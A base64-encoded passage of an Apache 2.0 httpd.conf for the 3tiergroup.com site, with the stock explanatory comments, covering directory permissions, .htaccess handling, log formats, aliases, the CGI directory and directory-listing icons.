ZXIgc2hvdWxkIGJlDQojIGUtbWFpbGVkLiAgVGhpcyBhZGRyZXNzIGFwcGVh
cnMgb24gc29tZSBzZXJ2ZXItZ2VuZXJhdGVkIHBhZ2VzLCBzdWNoDQojIGFz
IGVycm9yIGRvY3VtZW50cy4gIGUuZy4gYWRtaW5AeW91ci1kb21haW4uY29t
DQojDQpTZXJ2ZXJBZG1pbiBwc3RvcmNrQDN0aWVyZ3JvdXAuY29tDQoNCiMN
CiMgU2VydmVyTmFtZSBnaXZlcyB0aGUgbmFtZSBhbmQgcG9ydCB0aGF0IHRo
ZSBzZXJ2ZXIgdXNlcyB0byBpZGVudGlmeSBpdHNlbGYuDQojIFRoaXMgY2Fu
IG9mdGVuIGJlIGRldGVybWluZWQgYXV0b21hdGljYWxseSwgYnV0IHdlIHJl
Y29tbWVuZCB5b3Ugc3BlY2lmeQ0KIyBpdCBleHBsaWNpdGx5IHRvIHByZXZl
bnQgcHJvYmxlbXMgZHVyaW5nIHN0YXJ0dXAuDQojDQojIElmIHRoaXMgaXMg
bm90IHNldCB0byB2YWxpZCBETlMgbmFtZSBmb3IgeW91ciBob3N0LCBzZXJ2
ZXItZ2VuZXJhdGVkDQojIHJlZGlyZWN0aW9ucyB3aWxsIG5vdCB3b3JrLiAg
U2VlIGFsc28gdGhlIFVzZUNhbm9uaWNhbE5hbWUgZGlyZWN0aXZlLg0KIw0K
IyBJZiB5b3VyIGhvc3QgZG9lc24ndCBoYXZlIGEgcmVnaXN0ZXJlZCBETlMg
bmFtZSwgZW50ZXIgaXRzIElQIGFkZHJlc3MgaGVyZS4NCiMgWW91IHdpbGwg
aGF2ZSB0byBhY2Nlc3MgaXQgYnkgaXRzIGFkZHJlc3MgYW55d2F5LCBhbmQg
dGhpcyB3aWxsIG1ha2UgDQojIHJlZGlyZWN0aW9ucyB3b3JrIGluIGEgc2Vu
c2libGUgd2F5Lg0KIw0KU2VydmVyTmFtZSAzdGllcmdyb3VwLmNvbTo4MA0K
DQojDQojIFVzZUNhbm9uaWNhbE5hbWU6IERldGVybWluZXMgaG93IEFwYWNo
ZSBjb25zdHJ1Y3RzIHNlbGYtcmVmZXJlbmNpbmcgDQojIFVSTHMgYW5kIHRo
ZSBTRVJWRVJfTkFNRSBhbmQgU0VSVkVSX1BPUlQgdmFyaWFibGVzLg0KIyBX
aGVuIHNldCAiT2ZmIiwgQXBhY2hlIHdpbGwgdXNlIHRoZSBIb3N0bmFtZSBh
bmQgUG9ydCBzdXBwbGllZA0KIyBieSB0aGUgY2xpZW50LiAgV2hlbiBzZXQg
Ik9uIiwgQXBhY2hlIHdpbGwgdXNlIHRoZSB2YWx1ZSBvZiB0aGUNCiMgU2Vy
dmVyTmFtZSBkaXJlY3RpdmUuDQojDQpVc2VDYW5vbmljYWxOYW1lIE9mZg0K
DQojDQojIERvY3VtZW50Um9vdDogVGhlIGRpcmVjdG9yeSBvdXQgb2Ygd2hp
Y2ggeW91IHdpbGwgc2VydmUgeW91cg0KIyBkb2N1bWVudHMuIEJ5IGRlZmF1
bHQsIGFsbCByZXF1ZXN0cyBhcmUgdGFrZW4gZnJvbSB0aGlzIGRpcmVjdG9y
eSwgYnV0DQojIHN5bWJvbGljIGxpbmtzIGFuZCBhbGlhc2VzIG1heSBiZSB1
c2VkIHRvIHBvaW50IHRvIG90aGVyIGxvY2F0aW9ucy4NCiMNCkRvY3VtZW50
Um9vdCAiL3Vzci9sb2NhbC9odGRvY3MiDQoNCiMNCiMgRWFjaCBkaXJlY3Rv
cnkgdG8gd2hpY2ggQXBhY2hlIGhhcyBhY2Nlc3MgY2FuIGJlIGNvbmZpZ3Vy
ZWQgd2l0aCByZXNwZWN0DQojIHRvIHdoaWNoIHNlcnZpY2VzIGFuZCBmZWF0
dXJlcyBhcmUgYWxsb3dlZCBhbmQvb3IgZGlzYWJsZWQgaW4gdGhhdA0KIyBk
aXJlY3RvcnkgKGFuZCBpdHMgc3ViZGlyZWN0b3JpZXMpLiANCiMNCiMgRmly
c3QsIHdlIGNvbmZpZ3VyZSB0aGUgImRlZmF1bHQiIHRvIGJlIGEgdmVyeSBy
ZXN0cmljdGl2ZSBzZXQgb2YgDQojIGZlYXR1cmVzLiAgDQojDQo8RGlyZWN0
b3J5IC8+DQogICAgT3B0aW9ucyBGb2xsb3dTeW1MaW5rcw0KICAgIEFsbG93
T3ZlcnJpZGUgQWxsDQo8L0RpcmVjdG9yeT4NCg0KIw0KIyBOb3RlIHRoYXQg
ZnJvbSB0aGlzIHBvaW50IGZvcndhcmQgeW91IG11c3Qgc3BlY2lmaWNhbGx5
IGFsbG93DQojIHBhcnRpY3VsYXIgZmVhdHVyZXMgdG8gYmUgZW5hYmxlZCAt
IHNvIGlmIHNvbWV0aGluZydzIG5vdCB3b3JraW5nIGFzDQojIHlvdSBtaWdo
dCBleHBlY3QsIG1ha2Ugc3VyZSB0aGF0IHlvdSBoYXZlIHNwZWNpZmljYWxs
eSBlbmFibGVkIGl0DQojIGJlbG93Lg0KIw0KDQojDQojIFRoaXMgc2hvdWxk
IGJlIGNoYW5nZWQgdG8gd2hhdGV2ZXIgeW91IHNldCBEb2N1bWVudFJvb3Qg
dG8uDQojDQo8RGlyZWN0b3J5ICIvdXNyL2xvY2FsL2h0ZG9jcyI+DQoNCiMN
CiMgUG9zc2libGUgdmFsdWVzIGZvciB0aGUgT3B0aW9ucyBkaXJlY3RpdmUg
YXJlICJOb25lIiwgIkFsbCIsDQojIG9yIGFueSBjb21iaW5hdGlvbiBvZjoN
CiMgICBJbmRleGVzIEluY2x1ZGVzIEZvbGxvd1N5bUxpbmtzIFN5bUxpbmtz
aWZPd25lck1hdGNoIEV4ZWNDR0kgTXVsdGl2aWV3cw0KIw0KIyBOb3RlIHRo
YXQgIk11bHRpVmlld3MiIG11c3QgYmUgbmFtZWQgKmV4cGxpY2l0bHkqIC0t
LSAiT3B0aW9ucyBBbGwiDQojIGRvZXNuJ3QgZ2l2ZSBpdCB0byB5b3UuDQoj
DQojIFRoZSBPcHRpb25zIGRpcmVjdGl2ZSBpcyBib3RoIGNvbXBsaWNhdGVk
IGFuZCBpbXBvcnRhbnQuICBQbGVhc2Ugc2VlDQojIGh0dHA6Ly9odHRwZC5h
cGFjaGUub3JnL2RvY3MtMi4wL21vZC9jb3JlLmh0bWwjb3B0aW9ucw0KIyBm
b3IgbW9yZSBpbmZvcm1hdGlvbi4NCiMNCiAgICBPcHRpb25zIEluZGV4ZXMg
Rm9sbG93U3ltTGlua3MNCg0KIw0KIyBBbGxvd092ZXJyaWRlIGNvbnRyb2xz
IHdoYXQgZGlyZWN0aXZlcyBtYXkgYmUgcGxhY2VkIGluIC5odGFjY2VzcyBm
aWxlcy4NCiMgSXQgY2FuIGJlICJBbGwiLCAiTm9uZSIsIG9yIGFueSBjb21i
aW5hdGlvbiBvZiB0aGUga2V5d29yZHM6DQojICAgT3B0aW9ucyBGaWxlSW5m
byBBdXRoQ29uZmlnIExpbWl0DQojDQogICAgQWxsb3dPdmVycmlkZSBBbGwN
Cg0KIw0KIyBDb250cm9scyB3aG8gY2FuIGdldCBzdHVmZiBmcm9tIHRoaXMg
c2VydmVyLg0KIw0KICAgIE9yZGVyIGFsbG93LGRlbnkNCiAgICBBbGxvdyBm
cm9tIGFsbA0KDQo8L0RpcmVjdG9yeT4NCg0KIw0KIyBVc2VyRGlyOiBUaGUg
bmFtZSBvZiB0aGUgZGlyZWN0b3J5IHRoYXQgaXMgYXBwZW5kZWQgb250byBh
IHVzZXIncyBob21lDQojIGRpcmVjdG9yeSBpZiBhIH51c2VyIHJlcXVlc3Qg
aXMgcmVjZWl2ZWQuDQojDQpVc2VyRGlyIHB1YmxpY19odG1sDQoNCiMNCiMg
Q29udHJvbCBhY2Nlc3MgdG8gVXNlckRpciBkaXJlY3Rvcmllcy4gIFRoZSBm
b2xsb3dpbmcgaXMgYW4gZXhhbXBsZQ0KIyBmb3IgYSBzaXRlIHdoZXJlIHRo
ZXNlIGRpcmVjdG9yaWVzIGFyZSByZXN0cmljdGVkIHRvIHJlYWQtb25seS4N
CiMNCiM8RGlyZWN0b3J5IC9ob21lLyovcHVibGljX2h0bWw+DQojICAgIEFs
bG93T3ZlcnJpZGUgRmlsZUluZm8gQXV0aENvbmZpZyBMaW1pdA0KIyAgICBP
cHRpb25zIE11bHRpVmlld3MgSW5kZXhlcyBTeW1MaW5rc0lmT3duZXJNYXRj
aCBJbmNsdWRlc05vRXhlYw0KIyAgICA8TGltaXQgR0VUIFBPU1QgT1BUSU9O
UyBQUk9QRklORD4NCiMgICAgICAgIE9yZGVyIGFsbG93LGRlbnkNCiMgICAg
ICAgIEFsbG93IGZyb20gYWxsDQojICAgIDwvTGltaXQ+DQojICAgIDxMaW1p
dEV4Y2VwdCBHRVQgUE9TVCBPUFRJT05TIFBST1BGSU5EPg0KIyAgICAgICAg
T3JkZXIgZGVueSxhbGxvdw0KIyAgICAgICAgRGVueSBmcm9tIGFsbA0KIyAg
ICA8L0xpbWl0RXhjZXB0Pg0KIzwvRGlyZWN0b3J5Pg0KDQojDQojIERpcmVj
dG9yeUluZGV4OiBzZXRzIHRoZSBmaWxlIHRoYXQgQXBhY2hlIHdpbGwgc2Vy
dmUgaWYgYSBkaXJlY3RvcnkNCiMgaXMgcmVxdWVzdGVkLg0KIw0KIyBUaGUg
aW5kZXguaHRtbC52YXIgZmlsZSAoYSB0eXBlLW1hcCkgaXMgdXNlZCB0byBk
ZWxpdmVyIGNvbnRlbnQtDQojIG5lZ290aWF0ZWQgZG9jdW1lbnRzLiAgVGhl
IE11bHRpVmlld3MgT3B0aW9uIGNhbiBiZSB1c2VkIGZvciB0aGUgDQojIHNh
bWUgcHVycG9zZSwgYnV0IGl0IGlzIG11Y2ggc2xvd2VyLg0KIw0KRGlyZWN0
b3J5SW5kZXggaW5kZXguaHRtbCBpbmRleC5odG1sLnZhcg0KDQojDQojIEFj
Y2Vzc0ZpbGVOYW1lOiBUaGUgbmFtZSBvZiB0aGUgZmlsZSB0byBsb29rIGZv
ciBpbiBlYWNoIGRpcmVjdG9yeQ0KIyBmb3IgYWNjZXNzIGNvbnRyb2wgaW5m
b3JtYXRpb24uICBTZWUgYWxzbyB0aGUgQWxsb3dPdmVycmlkZSBkaXJlY3Rp
dmUuDQojDQpBY2Nlc3NGaWxlTmFtZSAuaHRhY2Nlc3MNCg0KIw0KIyBUaGUg
Zm9sbG93aW5nIGxpbmVzIHByZXZlbnQgLmh0YWNjZXNzIGFuZCAuaHRwYXNz
d2QgZmlsZXMgZnJvbSBiZWluZyANCiMgdmlld2VkIGJ5IFdlYiBjbGllbnRz
LiANCiMNCjxGaWxlcyB+ICJeXC5odCI+DQogICAgT3JkZXIgYWxsb3csZGVu
eQ0KICAgIERlbnkgZnJvbSBhbGwNCjwvRmlsZXM+DQoNCiMNCiMgVHlwZXND
b25maWcgZGVzY3JpYmVzIHdoZXJlIHRoZSBtaW1lLnR5cGVzIGZpbGUgKG9y
IGVxdWl2YWxlbnQpIGlzDQojIHRvIGJlIGZvdW5kLg0KIw0KVHlwZXNDb25m
aWcgY29uZi9taW1lLnR5cGVzDQoNCiMNCiMgRGVmYXVsdFR5cGUgaXMgdGhl
IGRlZmF1bHQgTUlNRSB0eXBlIHRoZSBzZXJ2ZXIgd2lsbCB1c2UgZm9yIGEg
ZG9jdW1lbnQNCiMgaWYgaXQgY2Fubm90IG90aGVyd2lzZSBkZXRlcm1pbmUg
b25lLCBzdWNoIGFzIGZyb20gZmlsZW5hbWUgZXh0ZW5zaW9ucy4NCiMgSWYg
eW91ciBzZXJ2ZXIgY29udGFpbnMgbW9zdGx5IHRleHQgb3IgSFRNTCBkb2N1
bWVudHMsICJ0ZXh0L3BsYWluIiBpcw0KIyBhIGdvb2QgdmFsdWUuICBJZiBt
b3N0IG9mIHlvdXIgY29udGVudCBpcyBiaW5hcnksIHN1Y2ggYXMgYXBwbGlj
YXRpb25zDQojIG9yIGltYWdlcywgeW91IG1heSB3YW50IHRvIHVzZSAiYXBw
bGljYXRpb24vb2N0ZXQtc3RyZWFtIiBpbnN0ZWFkIHRvDQojIGtlZXAgYnJv
d3NlcnMgZnJvbSB0cnlpbmcgdG8gZGlzcGxheSBiaW5hcnkgZmlsZXMgYXMg
dGhvdWdoIHRoZXkgYXJlDQojIHRleHQuDQojDQpEZWZhdWx0VHlwZSB0ZXh0
L3BsYWluDQoNCiMNCiMgVGhlIG1vZF9taW1lX21hZ2ljIG1vZHVsZSBhbGxv
d3MgdGhlIHNlcnZlciB0byB1c2UgdmFyaW91cyBoaW50cyBmcm9tIHRoZQ0K
IyBjb250ZW50cyBvZiB0aGUgZmlsZSBpdHNlbGYgdG8gZGV0ZXJtaW5lIGl0
cyB0eXBlLiAgVGhlIE1JTUVNYWdpY0ZpbGUNCiMgZGlyZWN0aXZlIHRlbGxz
IHRoZSBtb2R1bGUgd2hlcmUgdGhlIGhpbnQgZGVmaW5pdGlvbnMgYXJlIGxv
Y2F0ZWQuDQojDQo8SWZNb2R1bGUgbW9kX21pbWVfbWFnaWMuYz4NCiAgICBN
SU1FTWFnaWNGaWxlIGNvbmYvbWFnaWMNCjwvSWZNb2R1bGU+DQoNCiMNCiMg
SG9zdG5hbWVMb29rdXBzOiBMb2cgdGhlIG5hbWVzIG9mIGNsaWVudHMgb3Ig
anVzdCB0aGVpciBJUCBhZGRyZXNzZXMNCiMgZS5nLiwgd3d3LmFwYWNoZS5v
cmcgKG9uKSBvciAyMDQuNjIuMTI5LjEzMiAob2ZmKS4NCiMgVGhlIGRlZmF1
bHQgaXMgb2ZmIGJlY2F1c2UgaXQnZCBiZSBvdmVyYWxsIGJldHRlciBmb3Ig
dGhlIG5ldCBpZiBwZW9wbGUNCiMgaGFkIHRvIGtub3dpbmdseSB0dXJuIHRo
aXMgZmVhdHVyZSBvbiwgc2luY2UgZW5hYmxpbmcgaXQgbWVhbnMgdGhhdA0K
IyBlYWNoIGNsaWVudCByZXF1ZXN0IHdpbGwgcmVzdWx0IGluIEFUIExFQVNU
IG9uZSBsb29rdXAgcmVxdWVzdCB0byB0aGUNCiMgbmFtZXNlcnZlci4NCiMN
Ckhvc3RuYW1lTG9va3VwcyBPZmYNCg0KIw0KIyBFcnJvckxvZzogVGhlIGxv
Y2F0aW9uIG9mIHRoZSBlcnJvciBsb2cgZmlsZS4NCiMgSWYgeW91IGRvIG5v
dCBzcGVjaWZ5IGFuIEVycm9yTG9nIGRpcmVjdGl2ZSB3aXRoaW4gYSA8Vmly
dHVhbEhvc3Q+DQojIGNvbnRhaW5lciwgZXJyb3IgbWVzc2FnZXMgcmVsYXRp
bmcgdG8gdGhhdCB2aXJ0dWFsIGhvc3Qgd2lsbCBiZQ0KIyBsb2dnZWQgaGVy
ZS4gIElmIHlvdSAqZG8qIGRlZmluZSBhbiBlcnJvciBsb2dmaWxlIGZvciBh
IDxWaXJ0dWFsSG9zdD4NCiMgY29udGFpbmVyLCB0aGF0IGhvc3QncyBlcnJv
cnMgd2lsbCBiZSBsb2dnZWQgdGhlcmUgYW5kIG5vdCBoZXJlLg0KIw0KRXJy
b3JMb2cgbG9ncy9lcnJvcl9sb2cNCg0KIw0KIyBMb2dMZXZlbDogQ29udHJv
bCB0aGUgbnVtYmVyIG9mIG1lc3NhZ2VzIGxvZ2dlZCB0byB0aGUgZXJyb3Jf
bG9nLg0KIyBQb3NzaWJsZSB2YWx1ZXMgaW5jbHVkZTogZGVidWcsIGluZm8s
IG5vdGljZSwgd2FybiwgZXJyb3IsIGNyaXQsDQojIGFsZXJ0LCBlbWVyZy4N
CiMNCkxvZ0xldmVsIHdhcm4NCg0KIw0KIyBUaGUgZm9sbG93aW5nIGRpcmVj
dGl2ZXMgZGVmaW5lIHNvbWUgZm9ybWF0IG5pY2tuYW1lcyBmb3IgdXNlIHdp
dGgNCiMgYSBDdXN0b21Mb2cgZGlyZWN0aXZlIChzZWUgYmVsb3cpLg0KIw0K
TG9nRm9ybWF0ICIlaCAlbCAldSAldCBcIiVyXCIgJT5zICViIFwiJXtSZWZl
cmVyfWlcIiBcIiV7VXNlci1BZ2VudH1pXCIiIGNvbWJpbmVkDQpMb2dGb3Jt
YXQgIiVoICVsICV1ICV0IFwiJXJcIiAlPnMgJWIiIGNvbW1vbg0KTG9nRm9y
bWF0ICIle1JlZmVyZXJ9aSAtPiAlVSIgcmVmZXJlcg0KTG9nRm9ybWF0ICIl
e1VzZXItYWdlbnR9aSIgYWdlbnQNCg0KIw0KIyBUaGUgbG9jYXRpb24gYW5k
IGZvcm1hdCBvZiB0aGUgYWNjZXNzIGxvZ2ZpbGUgKENvbW1vbiBMb2dmaWxl
IEZvcm1hdCkuDQojIElmIHlvdSBkbyBub3QgZGVmaW5lIGFueSBhY2Nlc3Mg
bG9nZmlsZXMgd2l0aGluIGEgPFZpcnR1YWxIb3N0Pg0KIyBjb250YWluZXIs
IHRoZXkgd2lsbCBiZSBsb2dnZWQgaGVyZS4gIENvbnRyYXJpd2lzZSwgaWYg
eW91ICpkbyoNCiMgZGVmaW5lIHBlci08VmlydHVhbEhvc3Q+IGFjY2VzcyBs
b2dmaWxlcywgdHJhbnNhY3Rpb25zIHdpbGwgYmUNCiMgbG9nZ2VkIHRoZXJl
aW4gYW5kICpub3QqIGluIHRoaXMgZmlsZS4NCiMNCkN1c3RvbUxvZyBsb2dz
L2FjY2Vzc19sb2cgY29tbW9uDQoNCiMNCiMgSWYgeW91IHdvdWxkIGxpa2Ug
dG8gaGF2ZSBhZ2VudCBhbmQgcmVmZXJlciBsb2dmaWxlcywgdW5jb21tZW50
IHRoZQ0KIyBmb2xsb3dpbmcgZGlyZWN0aXZlcy4NCiMNCiNDdXN0b21Mb2cg
bG9ncy9yZWZlcmVyX2xvZyByZWZlcmVyDQojQ3VzdG9tTG9nIGxvZ3MvYWdl
bnRfbG9nIGFnZW50DQoNCiMNCiMgSWYgeW91IHByZWZlciBhIHNpbmdsZSBs
b2dmaWxlIHdpdGggYWNjZXNzLCBhZ2VudCwgYW5kIHJlZmVyZXIgaW5mb3Jt
YXRpb24NCiMgKENvbWJpbmVkIExvZ2ZpbGUgRm9ybWF0KSB5b3UgY2FuIHVz
ZSB0aGUgZm9sbG93aW5nIGRpcmVjdGl2ZS4NCiMNCiNDdXN0b21Mb2cgbG9n
cy9hY2Nlc3NfbG9nIGNvbWJpbmVkDQoNCiMNCiMgT3B0aW9uYWxseSBhZGQg
YSBsaW5lIGNvbnRhaW5pbmcgdGhlIHNlcnZlciB2ZXJzaW9uIGFuZCB2aXJ0
dWFsIGhvc3QNCiMgbmFtZSB0byBzZXJ2ZXItZ2VuZXJhdGVkIHBhZ2VzIChl
cnJvciBkb2N1bWVudHMsIEZUUCBkaXJlY3RvcnkgbGlzdGluZ3MsDQojIG1v
ZF9zdGF0dXMgYW5kIG1vZF9pbmZvIG91dHB1dCBldGMuLCBidXQgbm90IENH
SSBnZW5lcmF0ZWQgZG9jdW1lbnRzKS4NCiMgU2V0IHRvICJFTWFpbCIgdG8g
YWxzbyBpbmNsdWRlIGEgbWFpbHRvOiBsaW5rIHRvIHRoZSBTZXJ2ZXJBZG1p
bi4NCiMgU2V0IHRvIG9uZSBvZjogIE9uIHwgT2ZmIHwgRU1haWwNCiMNClNl
cnZlclNpZ25hdHVyZSBPbg0KDQojDQojIEFsaWFzZXM6IEFkZCBoZXJlIGFz
IG1hbnkgYWxpYXNlcyBhcyB5b3UgbmVlZCAod2l0aCBubyBsaW1pdCkuIFRo
ZSBmb3JtYXQgaXMgDQojIEFsaWFzIGZha2VuYW1lIHJlYWxuYW1lDQojDQoj
IE5vdGUgdGhhdCBpZiB5b3UgaW5jbHVkZSBhIHRyYWlsaW5nIC8gb24gZmFr
ZW5hbWUgdGhlbiB0aGUgc2VydmVyIHdpbGwNCiMgcmVxdWlyZSBpdCB0byBi
ZSBwcmVzZW50IGluIHRoZSBVUkwuICBTbyAiL2ljb25zIiBpc24ndCBhbGlh
c2VkIGluIHRoaXMNCiMgZXhhbXBsZSwgb25seSAiL2ljb25zLyIuICBJZiB0
aGUgZmFrZW5hbWUgaXMgc2xhc2gtdGVybWluYXRlZCwgdGhlbiB0aGUgDQoj
IHJlYWxuYW1lIG11c3QgYWxzbyBiZSBzbGFzaCB0ZXJtaW5hdGVkLCBhbmQg
aWYgdGhlIGZha2VuYW1lIG9taXRzIHRoZSANCiMgdHJhaWxpbmcgc2xhc2gs
IHRoZSByZWFsbmFtZSBtdXN0IGFsc28gb21pdCBpdC4NCiMNCiMgV2UgaW5j
bHVkZSB0aGUgL2ljb25zLyBhbGlhcyBmb3IgRmFuY3lJbmRleGVkIGRpcmVj
dG9yeSBsaXN0aW5ncy4gIElmIHlvdQ0KIyBkbyBub3QgdXNlIEZhbmN5SW5k
ZXhpbmcsIHlvdSBtYXkgY29tbWVudCB0aGlzIG91dC4NCiMNCkFsaWFzIC9p
Y29ucy8gIi91c3IvbG9jYWwvaWNvbnMvIg0KDQo8RGlyZWN0b3J5ICIvdXNy
L2xvY2FsL2ljb25zIj4NCiAgICBPcHRpb25zIEluZGV4ZXMgTXVsdGlWaWV3
cw0KICAgIEFsbG93T3ZlcnJpZGUgTm9uZQ0KICAgIE9yZGVyIGFsbG93LGRl
bnkNCiAgICBBbGxvdyBmcm9tIGFsbA0KPC9EaXJlY3Rvcnk+DQoNCiMNCiMg
VGhpcyBzaG91bGQgYmUgY2hhbmdlZCB0byB0aGUgU2VydmVyUm9vdC9tYW51
YWwvLiAgVGhlIGFsaWFzIHByb3ZpZGVzDQojIHRoZSBtYW51YWwsIGV2ZW4g
aWYgeW91IGNob29zZSB0byBtb3ZlIHlvdXIgRG9jdW1lbnRSb290LiAgWW91
IG1heSBjb21tZW50DQojIHRoaXMgb3V0IGlmIHlvdSBkbyBub3QgY2FyZSBm
b3IgdGhlIGRvY3VtZW50YXRpb24uDQojDQpBbGlhcyAvbWFudWFsICIvdXNy
L2xvY2FsL21hbnVhbCINCg0KPERpcmVjdG9yeSAiL3Vzci9sb2NhbC9tYW51
YWwiPg0KICAgIE9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcyBNdWx0
aVZpZXdzDQogICAgQWxsb3dPdmVycmlkZSBOb25lDQogICAgT3JkZXIgYWxs
b3csZGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0RpcmVjdG9yeT4NCg0K
Iw0KIyBTY3JpcHRBbGlhczogVGhpcyBjb250cm9scyB3aGljaCBkaXJlY3Rv
cmllcyBjb250YWluIHNlcnZlciBzY3JpcHRzLg0KIyBTY3JpcHRBbGlhc2Vz
IGFyZSBlc3NlbnRpYWxseSB0aGUgc2FtZSBhcyBBbGlhc2VzLCBleGNlcHQg
dGhhdA0KIyBkb2N1bWVudHMgaW4gdGhlIHJlYWxuYW1lIGRpcmVjdG9yeSBh
cmUgdHJlYXRlZCBhcyBhcHBsaWNhdGlvbnMgYW5kDQojIHJ1biBieSB0aGUg
c2VydmVyIHdoZW4gcmVxdWVzdGVkIHJhdGhlciB0aGFuIGFzIGRvY3VtZW50
cyBzZW50IHRvIHRoZSBjbGllbnQuDQojIFRoZSBzYW1lIHJ1bGVzIGFib3V0
IHRyYWlsaW5nICIvIiBhcHBseSB0byBTY3JpcHRBbGlhcyBkaXJlY3RpdmVz
IGFzIHRvDQojIEFsaWFzLg0KIw0KU2NyaXB0QWxpYXMgL2NnaS1iaW4vICIv
dXNyL2xvY2FsL2NnaS1iaW4vIg0KDQo8SWZNb2R1bGUgbW9kX2NnaWQuYz4N
CiMNCiMgQWRkaXRpb25hbCB0byBtb2RfY2dpZC5jIHNldHRpbmdzLCBtb2Rf
Y2dpZCBoYXMgU2NyaXB0c29jayA8cGF0aD4NCiMgZm9yIHNldHRpbmcgVU5J
WCBzb2NrZXQgZm9yIGNvbW11bmljYXRpbmcgd2l0aCBjZ2lkLg0KIw0KI1Nj
cmlwdHNvY2sgICAgICAgICAgICBsb2dzL2NnaXNvY2sNCjwvSWZNb2R1bGU+
DQoNCiMNCiMgIi91c3IvbG9jYWwvY2dpLWJpbiIgc2hvdWxkIGJlIGNoYW5n
ZWQgdG8gd2hhdGV2ZXIgeW91ciBTY3JpcHRBbGlhc2VkDQojIENHSSBkaXJl
Y3RvcnkgZXhpc3RzLCBpZiB5b3UgaGF2ZSB0aGF0IGNvbmZpZ3VyZWQuDQoj
DQo8RGlyZWN0b3J5ICIvdXNyL2xvY2FsL2NnaS1iaW4iPg0KICAgIEFsbG93
T3ZlcnJpZGUgTm9uZQ0KICAgIE9wdGlvbnMgTm9uZQ0KICAgIE9yZGVyIGFs
bG93LGRlbnkNCiAgICBBbGxvdyBmcm9tIGFsbA0KPC9EaXJlY3Rvcnk+DQoN
CiMNCiMgUmVkaXJlY3QgYWxsb3dzIHlvdSB0byB0ZWxsIGNsaWVudHMgYWJv
dXQgZG9jdW1lbnRzIHdoaWNoIHVzZWQgdG8gZXhpc3QgaW4NCiMgeW91ciBz
ZXJ2ZXIncyBuYW1lc3BhY2UsIGJ1dCBkbyBub3QgYW55bW9yZS4gVGhpcyBh
bGxvd3MgeW91IHRvIHRlbGwgdGhlDQojIGNsaWVudHMgd2hlcmUgdG8gbG9v
ayBmb3IgdGhlIHJlbG9jYXRlZCBkb2N1bWVudC4NCiMgRXhhbXBsZToNCiMg
UmVkaXJlY3QgcGVybWFuZW50IC9mb28gaHR0cDovL3d3dy5leGFtcGxlLmNv
bS9iYXINCg0KIw0KIyBEaXJlY3RpdmVzIGNvbnRyb2xsaW5nIHRoZSBkaXNw
bGF5IG9mIHNlcnZlci1nZW5lcmF0ZWQgZGlyZWN0b3J5IGxpc3RpbmdzLg0K
Iw0KDQojDQojIEZhbmN5SW5kZXhpbmcgaXMgd2hldGhlciB5b3Ugd2FudCBm
YW5jeSBkaXJlY3RvcnkgaW5kZXhpbmcgb3Igc3RhbmRhcmQuDQojIFZlcnNp
b25Tb3J0IGlzIHdoZXRoZXIgZmlsZXMgY29udGFpbmluZyB2ZXJzaW9uIG51
bWJlcnMgc2hvdWxkIGJlIA0KIyBjb21wYXJlZCBpbiB0aGUgbmF0dXJhbCB3
YXksIHNvIHRoYXQgYGFwYWNoZS0xLjMuOS50YXInIGlzIHBsYWNlZCBiZWZv
cmUNCiMgYGFwYWNoZS0xLjMuMTIudGFyJy4NCiMNCkluZGV4T3B0aW9ucyBG
YW5jeUluZGV4aW5nIFZlcnNpb25Tb3J0DQoNCiMNCiMgQWRkSWNvbiogZGly
ZWN0aXZlcyB0ZWxsIHRoZSBzZXJ2ZXIgd2hpY2ggaWNvbiB0byBzaG93IGZv
ciBkaWZmZXJlbnQNCiMgZmlsZXMgb3IgZmlsZW5hbWUgZXh0ZW5zaW9ucy4g
IFRoZXNlIGFyZSBvbmx5IGRpc3BsYXllZCBmb3INCiMgRmFuY3lJbmRleGVk
IGRpcmVjdG9yaWVzLg0KIw0KQWRkSWNvbkJ5RW5jb2RpbmcgKENNUCwvaWNv
bnMvY29tcHJlc3NlZC5naWYpIHgtY29tcHJlc3MgeC1nemlwDQoNCkFkZElj
b25CeVR5cGUgKFRYVCwvaWNvbnMvdGV4dC5naWYpIHRleHQvKg0KQWRkSWNv
bkJ5VHlwZSAoSU1HLC9pY29ucy9pbWFnZTIuZ2lmKSBpbWFnZS8qDQpBZGRJ
Y29uQnlUeXBlIChTTkQsL2ljb25zL3NvdW5kMi5naWYpIGF1ZGlvLyoNCkFk
ZEljb25CeVR5cGUgKFZJRCwvaWNvbnMvbW92aWUuZ2lmKSB2aWRlby8qDQoN
CkFkZEljb24gL2ljb25zL2JpbmFyeS5naWYgLmJpbiAuZXhlDQpBZGRJY29u
IC9pY29ucy9iaW5oZXguZ2lmIC5ocXgNCkFkZEljb24gL2ljb25zL3Rhci5n
aWYgLnRhcg0KQWRkSWNvbiAvaWNvbnMvd29ybGQyLmdpZiAud3JsIC53cmwu
Z3ogLnZybWwgLnZybSAuaXYNCkFkZEljb24gL2ljb25zL2NvbXByZXNzZWQu
Z2lmIC5aIC56IC50Z3ogLmd6IC56aXANCkFkZEljb24gL2ljb25zL2EuZ2lm
IC5wcyAuYWkgLmVwcw0KQWRkSWNvbiAvaWNvbnMvbGF5b3V0LmdpZiAuaHRt
bCAuc2h0bWwgLmh0bSAucGRmDQpBZGRJY29uIC9pY29ucy90ZXh0LmdpZiAu
dHh0DQpBZGRJY29uIC9pY29ucy9jLmdpZiAuYw0KQWRkSWNvbiAvaWNvbnMv
cC5naWYgLnBsIC5weQ0KQWRkSWNvbiAvaWNvbnMvZi5naWYgLmZvcg0KQWRk
SWNvbiAvaWNvbnMvZHZpLmdpZiAuZHZpDQpBZGRJY29uIC9pY29ucy91dWVu
Y29kZWQuZ2lmIC51dQ0KQWRkSWNvbiAvaWNvbnMvc2NyaXB0LmdpZiAuY29u
ZiAuc2ggLnNoYXIgLmNzaCAua3NoIC50Y2wNCkFkZEljb24gL2ljb25zL3Rl
eC5naWYgLnRleA0KQWRkSWNvbiAvaWNvbnMvYm9tYi5naWYgY29yZQ0KDQpB
ZGRJY29uIC9pY29ucy9iYWNrLmdpZiAuLg0KQWRkSWNvbiAvaWNvbnMvaGFu
ZC5yaWdodC5naWYgUkVBRE1FDQpBZGRJY29uIC9pY29ucy9mb2xkZXIuZ2lm
IF5eRElSRUNUT1JZXl4NCkFkZEljb24gL2ljb25zL2JsYW5rLmdpZiBeXkJM
QU5LSUNPTl5eDQoNCiMNCiMgRGVmYXVsdEljb24gaXMgd2hpY2ggaWNvbiB0
byBzaG93IGZvciBmaWxlcyB3aGljaCBkbyBub3QgaGF2ZSBhbiBpY29uDQoj
